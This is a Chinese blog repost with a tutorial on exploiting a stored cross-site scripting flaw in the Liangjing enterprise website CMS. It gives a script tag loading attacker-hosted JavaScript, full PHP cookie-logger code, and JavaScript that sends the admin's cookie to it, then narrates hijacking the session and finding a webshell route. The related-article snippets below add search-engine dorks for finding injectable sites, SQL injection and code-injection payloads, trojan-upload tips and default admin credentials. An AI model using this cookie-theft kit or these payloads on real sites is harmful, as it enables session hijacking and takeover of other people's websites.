良精管理系统漏洞

最新推荐文章于 2022-09-28 10:59:53 发布
最新推荐文章于 2022-09-28 10:59:53 发布
阅读量400 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/allyesno/archive/2007/05/12/743644.html
版权

主题:良精多风格多语企业网站管理系统有漏洞
难度:中
知识点:脚本、跨站
工具包:get.php    MyBrower.exe   qq.js
漏洞处:公司名称跨站漏洞


今天让大家看一下漏洞的利用方法


<script src=http://192.168.1.101/qq.js></script>


192.168.1.101/get.php是我们获得COOKIE的程序
192.168.1.101/test.txt是我们获得cookie的文本

get.php
----------------------
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('test.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
------------------------
qq,js
------------------------
document.write('<img src="http://localhost/get.php?c='+document.cookie+'" width=0 height=0 border=0 />');
------------------------

现在模拟管理员进管理后台

点了一下这里,就有问题了
我们获得他的SESSION
现在来入侵


^_^这样就进来了。晕啊呵呵

看,这样不行的哦

良精的人可能还不信,说这是小儿科。不信我就修改一下看看  哼


信了不。88
我们已经发现了可以获得webshell的地方

转载于:https://www.cnblogs.com/allyesno/archive/2007/05/12/743644.html

weixin_30896825
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通杀良精南方数据网软上传漏洞工具
02-16
具体漏洞文件路径要在源代码中修改![upfile_other.asp]上传木马文件记得加空格
良精企业智能建站管理系统
08-15
"良精企业智能建站管理系统"是一款基于PHP开发的开源企业网站管理平台,旨在帮助企业轻松构建和管理自己的官方网站。这款系统具有高度的灵活性和可定制性,使得企业网站的优化变得更加直接有效,避免了不必要的复杂...
良精企业管理系统注入漏洞
weixin_30387339的博客
09-11 401
漏洞文件: en/DownloadShow.asp chinese/DownloadShow.asp 漏洞利用: 在百度键入:inurl: (DownloadShow.asp?DownID=) 在谷歌键入:allinurl: DownloadShow.asp?DownID= 获得搜索页面地址复制下来.打开阿D2.32.将地址粘贴到检测地址栏里就会看到软件下方有很多可用注入点 比如:h...
良精企业通用建站系统漏洞总汇
fengling132的专栏
06-05 2183
一,SQl注入漏洞 1,典型的Cookies注入 漏洞文件:Shownews.asp 问题代码:id=cstr(request(“id”)) Set rsnews=Server.CreateObject(“ADODB.RecordSet”) sql=”update news set hits=hits+1 where id=”&id conn.execute sql sq
宜信开源|漏洞管理平台『洞察』部署指南
chenxi4820的博客
07-15 1953
『洞察』——集成应用系统资产管理、漏洞全生命周期管理、安全知识库管理三位一体的管理平台。 『洞察』使用了Python语言进行开发,利用Flask框架+MySQL+Docker部署实现。 一、部署和启动mysql docker pull mysql:5.7.13 docker run -d -...
良精cms php漏洞,Phpcms 2008 漏洞整理
weixin_34357232的博客
03-10 401
盲注flash_upload.php?modelid=1product.php pagesize参数代码注射漏洞yp/product.php?pagesize=${@print(md5(admin))}yp/product.php?pagesize=${@phpinfo()}askarch_ajax.phpSQL注射漏洞ask/search_ajax.php?q=s%E6'/**/or/**/(...
良精企业智能建站管理系统 v1.14
08-22
良精企业智能建站管理系统 v1.14》是一款专为中小企业打造的开源PHP网站管理系统,旨在帮助企业轻松建立和管理自己的官方网站,实现网站优化,避免在网站建设和维护过程中遇到的诸多难题。这款系统的核心特点是其...
南方数据企业网站管理系统源码包-存有sql注入漏洞与数据库备份getshell漏洞.zip
01-05
南方数据企业网站管理系统-存有sql注入漏洞与数据库备份getshell漏洞,如有侵权,请联系CSDN管理员删除即可
良精南方网站系统拿webshell的教程
03-06
本教程主要针对良精南方网站系统,详细讲解如何利用系统漏洞来上传木马文件,从而获取webshell。了解并掌握这个过程对于网络安全防御和渗透测试都具有重要意义。 首先,我们要明白良精南方系统可能存在的漏洞类型。...
良精公司企业网站管理系统 v1.0 开源版 build 090917
03-14
"良精公司企业网站管理系统 v1.0 开源版 build 090917" 是一款专为企业设计的网站管理平台,旨在提供一个高效、易用且灵活的解决方案,帮助企业管理其在线业务。该系统的核心特性是开源,这意味着用户可以查看、修改...
补丁及漏洞管理细则
03-03
规范补丁管理流程,减少安全漏洞,使计算机免予遭受利用漏洞的各种恶意攻击,尽最大限度的保证计算机安全、稳定的运行。
通杀良精南方数据网软上传漏洞
12-16
通杀良精南方数据网软上传漏洞通杀良精南方数据网软上传漏洞通杀良精南方数据网软上传漏洞
存在cookie注入南方数据cms
04-24
Windows2008建站不成功,显示不出来,最好用win10吧,win10显示正常
南方数据漏洞 想拿shell的就下吧
06-28
南方数据漏洞 感觉还不错!!!!
良精cms php漏洞,南方数据、良精系统、网软天下漏洞利用
weixin_36330518的博客
03-10 810
1、通过upfile_other.asp漏洞文件直接取SHELL直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:BODY {FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee}.tx1 {BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px s...
西门子工业网络管理系统中存在15个漏洞,可导致RCE
smellycat000的专栏
06-21 545
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全研究员披露了位于西门子 SINEC 网络管理系统 (NMS) 中的15个漏洞详情,其中一些漏洞可被攻击者组合利用,最终在受影响系统上实现远程代码执行。工业安全公司 Claroty 发布报告指出,“如果这些漏洞遭利用,可对网络上的西门子设备带来诸多风险,包括拒绝服务攻击、凭据泄露和在某些情况下的远程代码执行。”这些...
若依管理系统漏洞利用
热门推荐
qq_40461312的博客
09-27 1万+
若依(RuoYi)管理系统 后台任意文件读取,SQL注入 一、若依管理系统简介 基于SpringBoot的权限管理系统 易读易懂、界面简洁美观。 核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用 二、若依管理系统后台任意文件下载 该漏洞需要登陆后台后进行测试,该管理系统多为默认账户密码 fofa搜索语句:app=”若依-管理系统” 账号:admin 密码:admin123 登陆成功后直接访问 http://目标网站url/common/dow..
发现安全漏洞后需要怎样进行漏洞的生命周期管理
最新发布
m0_73803866的博客
09-28 1307
最后,我们一起来总结红队防守工作最佳实践的要点,具体如下。(1)一把手重视,全员认知安全一把手必须重视,全员(如办公人员、保安等)提高安全防 范意识。(2)专项组织,责任到人牵头部门要有话语权,组织形成跨部门的专项组织,明确工作职 责,责任到人。专项组织可以包括领导小组(主管安全领导,层级越 高越好)、检查工作组、防护工作组(事件监测、分析研判、事件处 置)和保障工作组等工作小组。(3)摸清家底,厘清责任梳理全部资产的属性和网络路径,明确资产的主管、运维责任, 为后续工作打下基础。
2021年8月27日10点29分 常见漏洞
weixin_42315611的博客
08-27 400
CSRF客户端请求伪造 CSRF(Cross Site Request Forgery) 是一种挟制终端用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。 漏洞原因:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。 利用前提:攻击者可以得到url的所有参数项并了解其含义,并且这些参数的值是用户可以 控制的,这时就可以根据URL构造一个payload。CSRF通常是发生在有意义的操作上,比如修改资料,加关注等其他一些敏感操作。 发现漏洞 确定功能点并抓包 寻找
安全运营之漏洞管理
学而思(xiejava的blog)
04-25 8781
1947年冯·诺依曼建立计算机系统结构理论时认为,计算机系统也有天生的类似基因的缺陷,也可能在使用和发展过程中产生意想不到的问题。在各种产品、主机、网络和复杂信息系统中,安全漏洞以不同形式存在,而且数量逐年增加,利用漏洞造成的各类安全事件层出不穷,导致越来越多的网络终端受害,大量机密信息被窃取,敏感数据信息在互联网上传播。工业控制领域以及新技术新应用的安全漏洞,特别是基础核心系统的安全漏洞已经成为危害国家经济和发展安全的重要因素。在安全运营过程中一个最重要的工作就是漏洞管理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值